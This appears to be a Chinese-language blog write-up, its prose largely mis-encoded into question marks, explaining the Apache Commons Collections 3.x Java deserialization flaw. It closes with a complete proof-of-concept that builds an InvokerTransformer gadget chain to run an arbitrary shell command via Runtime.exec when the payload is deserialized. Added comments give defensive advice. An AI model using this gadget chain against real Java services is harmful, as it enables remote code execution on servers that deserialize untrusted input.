????jenkins???????????????????????????????????????????????????????JAVA?????л??????????????е????????????????б??????JAVA?????л????????????
????JAVA?????л????
?????????л???????????????л??????????????????????磬???1???????????????л???????????л??????б??????????????????????????????????й?????????????????????δ??????л??????????????·????л????????????Java???л????????RMI(Java Remote Method Invocatio?? ??????????)?? JMX(Java Management Extensions?? Java???????)?? JMS(Java Message Service?? Java???????) ?????С?
????????Apache Commons Collections????????????
????Apache Commons Collections???????????????????Щ???????????л?????????????????С?????????Apache Commons Collections 3.2.1???????????ι?????????????????????л?????????readObject()????????????????????С?
???????÷????????????????
?????????о???????? InvokerTransformer ???е? transform() ??????????????? ??в?????????????????????????н????
public classInvokerTransformerimplementsTransformer??Serializable{
private static final long serialVersionUID = -8653385846894047688L;
private final String iMethodName;
private final Class[] iParamTypes;
private final Object[] iArgs;
/**
 * No-argument variant: stores only the method name and leaves parameter
 * types and arguments null (the method will be looked up as a no-arg method).
 * Note this class is Serializable and none of these fields is transient, so
 * on deserialization all three values come straight from the input stream.
 */
privateInvokerTransformer(String methodName){
this.iMethodName = methodName;
this.iParamTypes = null;
this.iArgs = null;
}
/**
 * Stores the method name, parameter types and argument values that
 * {@code transform(Object)} later resolves reflectively on the input's class
 * and invokes. Because the instance is Serializable and these fields are not
 * transient, a deserialized instance carries whatever name/types/args were in
 * the stream -- this is the property the deserialization gadget chain below relies on.
 */
publicInvokerTransformer(String methodName?? Class[] paramTypes?? Object[] args){
this.iMethodName = methodName;
this.iParamTypes = paramTypes;
this.iArgs = args;
}
publicObjecttransform(Object input){
if(input == null) {
return null;
} else {
try {
Class cls = input.getClass();
Method method = cls.getMethod(this.iMethodName?? this.iParamTypes);
return method.invoke(input?? this.iArgs);
}
???????????????? transform() ??????????????????? StringBuffer ??? append() ??????????????
????????transform()????
?????????????????????????????? InvokerTransformer ???е? transform() ???????????????С?
????Apache Commons Collections??????? TransformedMap ???????? Map ???????任???????? decorate() ??????????key??value??任???? Transformer ??????????? Map ????????????? TransformedMap ?? decorate() ???????£?
/**
 * Factory for a TransformedMap wrapping {@code map}: the key and value
 * transformers are applied to entries as they are put into / set on the map.
 * Either transformer may be null (the PoC below passes null for the key transformer).
 */
????publicstaticMapdecorate(Map map?? Transformer keyTransformer?? Transformer valueTransformer){
????return new TransformedMap(map?? keyTransformer?? valueTransformer);
????}
????Transformer ????????????ж???? transform() ????????????????????????????????????????
/**
 * Single-method functor interface from Commons Collections: maps an input
 * object to an output object. InvokerTransformer is one implementation, so
 * any code holding a Transformer reference (e.g. TransformedMap) may end up
 * calling InvokerTransformer.transform() on it.
 */
????public interface Transformer {
????public Object transform(Object input);
????}
????????????? InvokerTransformer ??????? Transformer ??????????????????? InvokerTransformer ?? transform() ?????????????????????????????? TransformedMap ????? Transformer ????????????
????commons-collections 3.2.2 ???????? Map ??? put() ?????? MapEntry ??? setValue() ????????????? Transformer ???????? Transformer ????????????γ? ChainedTransformer ??
????????п?????????? Map ??? put() ????????????? InvokerTransformer ??? transform() ??????
???????????????
??????????????????? InvokerTransformer ??? transform() ??????????????????????????????????? Map ??? put() ?????? MapEntry ??? setValue() ??????????????????????????????????????л?(???? readObject() ????)???????? InvokerTransformer ??? transform() ???????′?????С?
????java???п??е? AnnotationInvocationHandler ?? ???????????? memberValues ?? Map ????????? readObject() ?????ж? memberValues ??????????? setValue() ??????
classAnnotationInvocationHandlerimplementsInvocationHandler??Serializable{
private final Class<? extends Annotation> type;
private final Map<String?? Object> memberValues;
/**
 * Package-private constructor (no access modifier), which is why the PoC
 * below has to reach it via reflection and setAccessible(true).
 * {@code memberValues} is stored as-is -- no defensive copy -- so a caller can
 * hand in a decorated Map whose setValue() runs arbitrary Transformers.
 */
AnnotationInvocationHandler(Class<? extends Annotation> type?? Map<String?? Object> memberValues) {
this.type = type;
this.memberValues = memberValues;
}
privatevoidreadObject(java.io.ObjectInputStream s)
throws java.io.IOException?? ClassNotFoundException {
s.defaultReadObject();
// Check to make sure that types have not evolved incompatibly
AnnotationType annotationType = null;
try {
annotationType = AnnotationType.getInstance(type);
} catch(IllegalArgumentException e) {
// Class is no longer an annotation type; all bets are off
return;
}
Map<String?? Class<?>> memberTypes = annotationType.memberTypes();
for (Map.Entry<String?? Object> memberValue : memberValues.entrySet()) {
String name = memberValue.getKey();
Class<?> memberType = memberTypes.get(name);
if (memberType != null) {  // i.e. member still exists
Object value = memberValue.getValue();
if (!(memberType.isInstance(value) ||
value instanceof ExceptionProxy)) {
// ??????????е?Transformer
memberValue.setValue(
new AnnotationTypeMismatchExceptionProxy(
value.getClass() + "[" + value + "]").setMember(
annotationType.members().get(name)));
????????????????????湹??? Map ?????? AnnotationInvocationHandler ?????????л????????? readObject() ?????л?????????????????С?
//
import java.io.*;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.util.HashMap;
import java.util.Map;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;
/**
* Created by js on 2017/5/6.
*/
/**
 * Proof-of-concept from the article: builds a Commons Collections 3.x
 * deserialization gadget chain, serializes it to a file and deserializes it
 * again, which executes the configured command during readObject().
 *
 * Defensive takeaways (not part of the original listing):
 *  - Never deserialize untrusted input with ObjectInputStream; if unavoidable,
 *    restrict classes with ObjectInputFilter / JEP 290 (JDK 9+, backported to 8u121+).
 *  - commons-collections 3.2.2 disables serialization of InvokerTransformer and
 *    related functors unless explicitly re-enabled; upgrade.
 *  - This trigger depends on the JDK's AnnotationInvocationHandler.readObject
 *    behavior (the article states it was verified on jdk1.8.0_112); later
 *    updates changed that method, so it may not fire -- confirm for your JDK.
 */
public classTest{
publicstaticvoidmain(String[] args)throwsException{
/*
 * Runtime.getRuntime().exec("open /Applications/Calculator.app");
 */
// Command to run, taken from argv[0] if given; otherwise the default below.
// (The "??" sequences are mis-encoded separators in the article's source.)
String command = (args.length != 0) ? args[0] : "/bin/sh??-c??open /Applications/Calculator.app";
String[] execArgs = command.split("??");
// Gadget chain, evaluated in order by ChainedTransformer; each output is the next input:
//   1. ConstantTransformer       -> Runtime.class
//   2. InvokerTransformer getMethod -> Method Runtime.getRuntime()
//   3. InvokerTransformer invoke    -> the Runtime instance
//   4. InvokerTransformer exec      -> Runtime.exec(execArgs)
Transformer[] transforms = new Transformer[] {
new ConstantTransformer(Runtime.class)??
new InvokerTransformer(
"getMethod"??
new Class[] {String.class?? Class[].class}??
new Object[] {"getRuntime"?? new Class[0]}
)??
new InvokerTransformer(
"invoke"??
new Class[] {Object.class?? Object[].class}??
new Object[] {null?? new Object[0]}
)??
new InvokerTransformer(
"exec"??
new Class[] {String[].class}??
new Object[] {execArgs}
)
};
Transformer transformerChain = new ChainedTransformer(transforms);
// The decorated map applies transformerChain to values on setValue()/put();
// the key transformer is null, so keys are untouched.
Map tempMap = new HashMap();
tempMap.put("hack"?? "you");
Map exMap = TransformedMap.decorate(tempMap?? null?? transformerChain);
// AnnotationInvocationHandler's constructor is package-private, hence reflection.
// Its readObject() calls setValue() on memberValues entries, which is the trigger.
Class cls = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
Constructor ctor = cls.getDeclaredConstructor(Class.class?? Map.class);
ctor.setAccessible(true);
Object instance = ctor.newInstance(Target.class?? exMap);
// Serialize the payload to disk. Streams are closed manually here; a
// try-with-resources would be the conventional form.
File f = new File("payload1");
ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(f));
oos.writeObject(instance);
oos.flush();
oos.close();
ObjectInputStream ois = new ObjectInputStream(new FileInputStream(f));
// Deserializing runs AnnotationInvocationHandler.readObject(), which walks the
// decorated map and invokes the transformer chain -- the command executes here,
// before the returned object is ever used.
Object newObj = ois.readObject();
ois.close();
}
}
??????ζ???????????????÷?????? Runtime() ??????????????????????:
????((Runtime) Runtime.class.getMethod("getRuntime"?? null).invoke(null?? null)).exec("/bin/sh -c open /Applications/Calculator.app")
??????????????л????????????????????????????????????ysoserial??????????????????? AnnotationInvocationHandler ?????????????????????????????JDK??汾?й??
?????: jdk1.8.0_112??????.